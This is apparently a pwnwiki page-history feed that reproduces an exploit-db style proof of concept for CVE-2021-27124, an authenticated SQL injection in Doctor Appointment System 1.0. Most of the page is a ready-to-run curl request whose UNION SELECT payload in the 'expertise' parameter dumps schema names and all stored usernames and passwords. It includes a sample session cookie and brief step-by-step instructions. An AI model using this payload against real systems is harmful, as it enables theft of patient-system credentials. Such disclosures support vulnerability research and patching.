https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-27124_Doctor_Appointment_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E CVE-2021-27124 Doctor Appointment System 1.0 SQL注入漏洞 - Revision history 2026-04-27T10:31:59Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2021-27124_Doctor_Appointment_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=3636&oldid=prev Pwnwiki: Created page with "<pre> # Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection # Date: 2021-02-09 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Homepage: https://ww..." 2021-05-30T03:01:58Z <p>Created page with &quot;&lt;pre&gt; # Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection # Date: 2021-02-09 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Homepage: https://ww...&quot;</p> <p><b>New page</b></p><div>&lt;pre&gt;<br /> # Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection<br /> # Date: 2021-02-09<br /> # Exploit Author: Soham Bakore, Nakul Ratti<br /> # Vendor Homepage:<br /> https://www.sourcecodester.com/php/14182/doctor-appointment-system.html<br /> # Software Link:<br /> https://www.sourcecodester.com/php/14182/doctor-appointment-system.html<br /> # Version: V1.0<br /> <br /> <br /> Vulnerable File:<br /> ----------------<br /> http://host/patient/search_result.php<br /> <br /> Vulnerable Issue:<br /> -----------------<br /> Expertise parameter has no input validation<br /> <br /> POC:<br /> ----<br /> 1] Login as a normal patient user<br /> 2] Insert cookie after successful login in the below command:<br /> curl -i -s -o tmp -k -X $'POST' \<br /> -H $'Host: 192.168.1.12' -H $'Content-Type:<br /> application/x-www-form-urlencoded' -H $'Content-Length: 288' -H<br /> $'Connection: close' -H $'Cookie: PHPSESSID=b85jccq5ns65d75g69j2uj37hf' -H<br /> $'Upgrade-Insecure-Requests: 1' \<br /> -b $'PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \<br /> --data-binary<br /> $'expertise=Bone\'+union+select+concat(\'Username-\',username),2,3,(select+(%40a)+from+(select(%40a%3a%3d0x00),(select+(%40a)+from+(information_schema.schemata)where+(%40a)in+(%40a%3a%3dconcat(%40a,schema_name,\'&lt;br&gt;\'))))a),concat(\'Password\',\'-\',password),6,7,8,9,10,11,12+from+users%23&amp;submit='<br /> \<br /> $'http://host/patient/search_result.php'<br /> 3] Check the tmp file for sensitive information from the database.<br /> ------------------<br /> &lt;/pre&gt;</div> Pwnwiki